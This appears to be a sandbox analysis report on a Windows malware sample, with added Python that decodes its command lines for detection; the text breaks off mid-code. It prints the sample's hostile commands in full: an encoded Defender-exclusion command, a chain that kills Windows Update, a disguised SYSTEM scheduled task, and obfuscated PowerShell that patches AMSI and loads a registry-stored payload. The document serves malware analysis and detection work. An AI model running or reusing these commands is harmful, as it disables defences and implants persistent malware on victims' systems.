Analysis
- max time kernel: 35s
- max time network: 104s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 05-05-2022 00:53
- Static task: static1
- Behavioral task: behavioral1
- Sample: File.exe
- Resource: win7-20220414-en
General
- Target: File.exe
- Size: 4.0MB
- MD5: f74ccaec9935cca19122478058c39f79
- SHA1: 5dbffbe85764d0bd43a90a1ef8eb8d8c5a540527
- SHA256: 8d2d9d8d937c880d75eb1e4a930f273a0b215ba1b15c07c10a7d902f23b0b08a
- SHA512: 2cb3379d4c37b2d74f3ae51a0cc0551eb146e5ff6822b0b76e15c63d9f6bd116ed569a5a72cd8be2c37695bfa5cb9ebdd08e27803a9d19cadcc6315b2ebde6ef
Malware Config
Signatures
- Modifies security service (2 TTPs, 5 IoCs)
  reg.exe deleted the following keys:
  - \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0
  - \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1
  - \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo
  - \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters
  - \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security
- Executes dropped EXE (2 IoCs)
  - PID 1060 [New]344334.exe
  - PID 1112 ger.exe
- Possible privilege escalation attempt (2 IoCs)
  - PID 3740 takeown.exe
  - PID 2600 icacls.exe
- Stops running service(s) (3 TTPs)
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  - [New]344334.exe queried key value \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation
- Modifies file permissions (1 TTP, 2 IoCs)
  - PID 3740 takeown.exe
  - PID 2600 icacls.exe
- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  - flow 6: ip-api.com
- Suspicious use of SetThreadContext (2 IoCs)
  - PID 1112 ger.exe set thread context of PID 1812 AppLaunch.exe
  - PID 1060 [New]344334.exe set thread context of PID 1408 conhost.exe
- Drops file in Windows directory (4 IoCs)
  conhost.exe:
  - File created: C:\Windows\Tasks\dialersvc32.job
  - File opened for modification: C:\Windows\Tasks\dialersvc32.job
  - File created: C:\Windows\Tasks\dialersvc64.job
  - File opened for modification: C:\Windows\Tasks\dialersvc64.job
- Launches sc.exe
  sc.exe is a Windows utility to control services on the system.
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Creates scheduled task(s) (1 TTP, 1 IoC)
  schtasks is often used by malware for persistence or to perform post-infection execution.
- Modifies registry key (1 TTP, 9 IoCs)
  - reg.exe PIDs 1472, 1108, 372, 2796, 3476, 3768, 3472, 2732, 1580
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  - PID 4392 powershell.exe (2 events)
  - PID 1060 [New]344334.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  - Token: SeDebugPrivilege, PID 4392 powershell.exe
  - Token: SeDebugPrivilege, PID 1812 AppLaunch.exe
  - Token: SeDebugPrivilege, PID 1060 [New]344334.exe
- Suspicious use of WriteProcessMemory (49 IoCs; the 47 listed events are collapsed to source → target pairs, count in parentheses)
  - PID 2736 File.exe → PID 1060 [New]344334.exe (2)
  - PID 2736 File.exe → PID 1112 ger.exe (3)
  - PID 1112 ger.exe → PID 1812 AppLaunch.exe (5)
  - PID 1060 [New]344334.exe → PID 4124 cmd.exe (2)
  - PID 4124 cmd.exe → PID 4392 powershell.exe (2)
  - PID 1060 [New]344334.exe → PID 4888 cmd.exe (2)
  - PID 4888 cmd.exe → PID 4528 sc.exe (2)
  - PID 4888 cmd.exe → PID 864 sc.exe (2)
  - PID 1060 [New]344334.exe → PID 1408 conhost.exe (11)
  - PID 4888 cmd.exe → PID 3284 sc.exe (2)
  - PID 4888 cmd.exe → PID 4520 sc.exe (2)
  - PID 4888 cmd.exe → PID 4904 sc.exe (2)
  - PID 4888 cmd.exe → PID 2796 reg.exe (2)
  - PID 4888 cmd.exe → PID 1580 reg.exe (2)
  - PID 4888 cmd.exe → PID 1472 reg.exe (2)
  - PID 1060 [New]344334.exe → PID 2416 cmd.exe (2)
  - PID 4888 cmd.exe → PID 1108 reg.exe (2)
  - PID 2416 cmd.exe → PID 3840 schtasks.exe (2)
Processes
- [depth 1] C:\Users\Admin\AppData\Local\Temp\File.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\File.exe"
  - Suspicious use of WriteProcessMemory
- [depth 2] C:\Users\Admin\AppData\Roaming\[New]344334.exe
  Command line: C:\Users\Admin\AppData\Roaming\[New]344334.exe
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- [depth 3] C:\Windows\System32\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
  - Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
  Decoded (base64 over UTF-16LE): <#mi#> Add-MpPreference <#zwlq#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#hqll#> -Force <#jh#>
  With the <# #> comment padding removed this is Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, a Defender exclusion that covers the whole user profile and the system drive.
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\System32\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
  (rename is a cmd.exe built-in, so it spawns no child process and does not appear below.)
  - Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\system32\sc.exe
  Command line: sc stop UsoSvc
- [depth 4] C:\Windows\system32\sc.exe
  Command line: sc stop WaaSMedicSvc
- [depth 4] C:\Windows\system32\sc.exe
  Command line: sc stop wuauserv
- [depth 4] C:\Windows\system32\sc.exe
  Command line: sc stop bits
- [depth 4] C:\Windows\system32\sc.exe
  Command line: sc stop dosvc
- [depth 4] C:\Windows\system32\reg.exe
  Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
  - Modifies registry key
- [depth 4] C:\Windows\system32\reg.exe
  Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
  - Modifies registry key
- [depth 4] C:\Windows\system32\reg.exe
  Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
  - Modifies security service
  - Modifies registry key
- [depth 4] C:\Windows\system32\reg.exe
  Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
  - Modifies registry key
- [depth 4] C:\Windows\system32\reg.exe
  Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
  - Modifies registry key
- [depth 4] C:\Windows\system32\takeown.exe
  Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
  - Possible privilege escalation attempt
  - Modifies file permissions
- [depth 4] C:\Windows\system32\icacls.exe
  Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
  - Possible privilege escalation attempt
  - Modifies file perm\issions
- [depth 4] C:\Windows\system32\reg.exe
  Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
  - Modifies registry key
- [depth 4] C:\Windows\system32\reg.exe
  Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
  - Modifies registry key
- [depth 4] C:\Windows\system32\reg.exe
  Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
  - Modifies registry key
- [depth 4] C:\Windows\system32\reg.exe
  Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
  - Modifies registry key
- [depth 4] C:\Windows\system32\schtasks.exe
  Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
- [depth 4] C:\Windows\system32\schtasks.exe
  Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
- [depth 4] C:\Windows\system32\schtasks.exe
  Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
- [depth 4] C:\Windows\system32\schtasks.exe
  Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
- [depth 4] C:\Windows\system32\schtasks.exe
  Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
- [depth 3] C:\Windows\System32\conhost.exe
  Command line: C:\Windows\System32\conhost.exe
  - Drops file in Windows directory
- [depth 3] C:\Windows\System32\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"
  - Suspicious use of WriteProcessMemory
- [depth 2] C:\Users\Admin\AppData\Roaming\ger.exe
  Command line: C:\Users\Admin\AppData\Roaming\ger.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
- [depth 3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  - Suspicious use of AdjustPrivilegeToken
- [depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"
  - Creates scheduled task(s)
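The three command lines above that matter for detection are the -EncodedCommand argument handed to powershell.exe, the '&'-chained cmd.exe one-liner that stops and deletes the update services, and the schtasks /create line. The Python below is an added example, not part of the sandbox report and not code from the sample: it decodes the encoded command (base64 over UTF-16LE, not UTF-8), strips the <# #> comment padding so a string match works again, splits the chain on unquoted '&' and labels each sub-command, and scores the scheduled task. The three input strings are copied from the report; the label names, the UPDATE_SERVICES set, the DEFENDER_TAMPER pattern and the lookalike-name heuristic are this example's own assumptions.

```python
"""Command-line triage for the process tree above.

Added example: not part of the sandbox report and not the sample's code. The
three input strings are copied from the report; the labels, UPDATE_SERVICES
and the task heuristics are this example's own choices.
"""
import base64
import re
import shlex
from collections import Counter
from typing import Optional

# powershell.exe -EncodedCommand argument (depth 4), copied from the report.
ENCODED = (
    "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA"
    "PAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAA"
    "QAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoA"
    "UwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYA"
    "bwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
)
# cmd.exe one-liner (depth 3 under [New]344334.exe), copied from the report.
UPDATE_KILL_CHAIN = (
    r'"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv'
    r' & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f'
    r' & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f'
    r' & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f'
    r' & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f'
    r' & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f'
    r' & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll'
    r' & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q'
    r' & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll'
    r' & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f'
    r' & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f'
    r' & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f'
    r' & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE'
)
# schtasks /create line, copied from the report.
TASK_CREATE = (
    r'schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC"'
    r' /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"'
)

UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
DEFENDER_TAMPER = re.compile(r"(Add|Set)-MpPreference\b.*-(Exclusion\w+|DisableRealtimeMonitoring)", re.I)
CMD_WRAPPER = re.compile(r'^\s*(?:"[^"]*cmd\.exe"\s+|cmd(?:\.exe)?\s+)*/c\s+', re.I)


def decode_encoded_command(b64: str) -> str:
    # -EncodedCommand is base64 over UTF-16LE, so decoding it as UTF-8 fails.
    return base64.b64decode(b64).decode("utf-16-le")


def strip_block_comments(ps: str) -> str:
    # The <# ... #> blocks carry no code; they exist to break naive string matches.
    return " ".join(re.sub(r"<#.*?#>", " ", ps, flags=re.S).split())


def split_cmd_chain(cmdline: str) -> list:
    # Drop a leading '"...\cmd.exe" cmd /c' wrapper, then split on '&' outside double quotes.
    parts, buf, quoted = [], [], False
    for ch in CMD_WRAPPER.sub("", cmdline, count=1):
        if ch == '"':
            quoted = not quoted
        if ch == "&" and not quoted:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return [p.strip() for p in parts if p.strip()]


def classify(sub: str) -> Optional[str]:
    # Coarse technique label for one sub-command; None means nothing to flag.
    t = [x.lower().strip('"') for x in shlex.split(sub, posix=False)]
    if not t:
        return None
    exe = t[0].rsplit("\\", 1)[-1]
    exe, args = (exe[:-4] if exe.endswith(".exe") else exe), t[1:]
    if exe == "sc" and args[:1] == ["stop"] and len(args) > 1 and args[1] in UPDATE_SERVICES:
        return "service_stop"
    if exe == "reg" and len(args) > 1 and args[0] == "delete" and "\\services\\" in args[1]:
        return "service_key_delete"
    if exe == "reg" and len(args) > 1 and args[0] == "add" and "\\windowsupdate\\au" in args[1]:
        return "update_policy_tamper"
    if exe in ("takeown", "icacls"):
        return "acl_tamper"
    if exe == "rename" and len(args) == 2 and args[0].endswith(".dll"):
        return "system_dll_rename"
    if exe == "schtasks" and "/change" in args and "/disable" in args:
        return "scheduled_task_disable"
    if exe == "schtasks" and "/create" in args:
        return "scheduled_task_create"
    return None


def triage(cmdline: str) -> dict:
    # Histogram of labels over the whole chain; a rule can fire on, say, service_stop >= 3.
    return dict(Counter(lbl for lbl in map(classify, split_cmd_chain(cmdline)) if lbl))


def assess_task_create(cmdline: str) -> list:
    # Properties that together make a schtasks /create line look like persistence.
    toks = shlex.split(cmdline, posix=False)
    opts = {toks[i].lower(): toks[i + 1].strip('"') for i in range(len(toks) - 1)
            if toks[i].startswith("/") and not toks[i + 1].startswith("/")}
    tr, tn = opts.get("/tr", "").lower(), opts.get("/tn", "").lower()
    checks = [
        ("runs_as_system", opts.get("/ru", "").lower() in ("system", "nt authority\\system")),
        ("highest_privilege", opts.get("/rl", "").lower() == "highest"),
        ("logon_trigger", opts.get("/sc", "").lower() == "onlogon"),
        ("user_writable_target", any(d in tr for d in ("\\appdata\\", "\\temp\\", "\\users\\public\\"))),
        # The real GoogleUpdateTaskMachine* tasks run GoogleUpdate.exe, not a chrome.exe under Roaming.
        ("lookalike_task_name", "googleupdate" in tn and not tr.endswith("googleupdate.exe")),
    ]
    return [name for name, hit in checks if hit]
```

triage(UPDATE_KILL_CHAIN) yields five service stops, five service-key deletions, two ACL changes, one system DLL rename, four update-policy writes and seven disabled update tasks; any three of those labels together on one command line is a sound alert condition. assess_task_create(TASK_CREATE) returns all five flags for the report's task. shlex is used in non-POSIX mode so that backslashes in Windows paths are kept literally and quoted task names stay one token.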
- [depth 1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lVTIsoRZRqKU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$oNtXvxywUVRgJv,[Parameter(Position=1)][Type]$rKtabXulif)$zFGApgSdGBc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$zFGApgSdGBc.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$oNtXvxywUVRgJv).SetImplementationFlags('Runtime,Managed');$zFGApgSdGBc.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$rKtabXulif,$oNtXvxywUVRgJv).SetImplementationFlags('Runtime,Managed');Write-Output $zFGApgSdGBc.CreateType();}$JhwOJVEAiVVwR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$xOfddbeoFqhbay=$JhwOJVEAiVVwR.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DYGbAdGLupiEkdXSGOb=lVTIsoRZRqKU @([String])([IntPtr]);$sVLaknzcJUuGExbgYQpIic=lVTIsoRZRqKU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ilvMzbTfdKj=$JhwOJVEAiVVwR.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$rvcBGlJtehUFtV=$xOfddbeoFqhbay.Invoke($Null,@([Object]$ilvMzbTfdKj,[Object]('Load'+'LibraryA')));$yCNifzSrkWPPrCwvG=$xOfddbeoFqhbay.Invoke($Null,@([Object]$ilvMzbTfdKj,[Object]('Vir'+'tual'+'Pro'+'tect')));$egncJue=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rvcBGlJtehUFtV,$DYGbAdGLupiEkdXSGOb).Invoke('a'+'m'+'si.dll');$TxOxABytDoWgRqiaO=$xOfddbeoFqhbay.Invoke($Null,@([Object]$egncJue,[Object]('Ams'+'iSc'+'an'+'Buffer')));$uNYhusJwqL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yCNifzSrkWPPrCwvG,$sVLaknzcJUuGExbgYQpIic).Invoke($TxOxABytDoWgRqiaO,[uint32]8,4,[ref]$uNYhusJwqL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TxOxABytDoWgRqiaO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yCNifzSrkWPPrCwvG,$sVLaknzcJUuGExbgYQpIic).Invoke($TxOxABytDoWgRqiaO,[uint32]8,0x20,[ref]$uNYhusJwqL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
- [depth 1] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:qphSYtDgPUaQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$pzBvKOYRmCWSDL,[Parameter(Position=1)][Type]$EFAgYYdLQk)$LHrGksefxuy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$LHrGksefxuy.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$pzBvKOYRmCWSDL).SetImplementationFlags('Runtime,Managed');$LHrGksefxuy.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$EFAgYYdLQk,$pzBvKOYRmCWSDL).SetImplementationFlags('Runtime,Managed');Write-Output $LHrGksefxuy.CreateType();}$UklPrTtCvXAKE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$bFZCgPJLQpMWSL=$UklPrTtCvXAKE.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qjwnZVgfYGEyIpNUFFm=qphSYtDgPUaQ @([String])([IntPtr]);$IAgXyeDeeKECVmKCzpfTCx=qphSYtDgPUaQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$fubcAluVegA=$UklPrTtCvXAKE.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$bpUYEuNEPdZgDQ=$bFZCgPJLQpMWSL.Invoke($Null,@([Object]$fubcAluVegA,[Object]('Load'+'LibraryA')));$zjogMWqNOZffxSuYf=$bFZCgPJLQpMWSL.Invoke($Null,@([Object]$fubcAluVegA,[Object]('Vir'+'tual'+'Pro'+'tect')));$kONiRRv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bpUYEuNEPdZgDQ,$qjwnZVgfYGEyIpNUFFm).Invoke('a'+'m'+'si.dll');$ygoYMPfnumwIUWRaB=$bFZCgPJLQpMWSL.Invoke($Null,@([Object]$kONiRRv,[Object]('Ams'+'iSc'+'an'+'Buffer')));$eUgBtXLZAE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zjogMWqNOZffxSuYf,$IAgXyeDeeKECVmKCzpfTCx).Invoke($ygoYMPfnumwIUWRaB,[uint32]8,4,[ref]$eUgBtXLZAE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$ygoYMPfnumwIUWRaB,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zjogMWqNOZffxSuYf,$IAgXyeDeeKECVmKCzpfTCx).Invoke($ygoYMPfnumwIUWRaB,[uint32]8,0x20,[ref]$eUgBtXLZAE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
- [depth 1] C:\Windows\System32\dllhost.exe
  Command line: C:\Windows\System32\dllhost.exe /Processid:{6bf855c0-4fdc-4af9-90b2-9bb7e4105660}
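The two powershell.EXE command lines above build delegates for LoadLibraryA and VirtualProtect by reflection, resolve amsi!AmsiScanBuffer through GetProcAddress, make its first 8 bytes writable (VirtualProtect with 4 = PAGE_READWRITE), overwrite them with a 6-byte stub on x64 or an 8-byte stub under SysWOW64, restore 0x20 = PAGE_EXECUTE_READ, and then Assembly.Load() a .NET image read from the HKLM\SOFTWARE value dialerstager. The Python below is an added example, not the report's or the sample's code: a minimal decoder for the patch bytes that shows what the stub returns (mov eax, 0x80070057 is E_INVALIDARG, so every later scan reports a failure rather than a detection; ret 0x18 pops the six stdcall arguments AmsiScanBuffer takes on x86), a check a memory scanner could run over the function's first bytes, and a check that a registry blob is a PE image as Assembly.Load requires. PATCH_X64 and PATCH_X86 are copied from the command lines; CLEAN_PROLOGUE and FAKE_PE are constructed stand-ins, not the real contents of amsi.dll or of the dialerstager value.

```python
"""Decoder for the AmsiScanBuffer patch used by the two powershell.EXE command lines above.

Added example: not part of the sandbox report and not the sample's code. PATCH_X64 and
PATCH_X86 are the byte arrays copied from the report; CLEAN_PROLOGUE and FAKE_PE are
constructed stand-ins, not the real contents of amsi.dll or of the dialerstager value.
"""

# Marshal.Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3), ...) in the x64 command line.
PATCH_X64 = bytes([0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3])
# Marshal.Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0), ...) in the SysWOW64 command line.
PATCH_X86 = bytes([0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00])
# Constructed: an ordinary-looking function start (mov [rsp+8], rbx; ...), not real amsi.dll bytes.
CLEAN_PROLOGUE = bytes([0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x74])

HRESULT_NAMES = {0x00000000: "S_OK", 0x80070057: "E_INVALIDARG"}


def disassemble_stub(code: bytes) -> list:
    # Just enough x86/x64 decoding for the opcodes these return-stub patches use.
    out, i = [], 0
    while i < len(code):
        op = code[i]
        if op == 0xB8 and i + 5 <= len(code):                                   # mov eax, imm32
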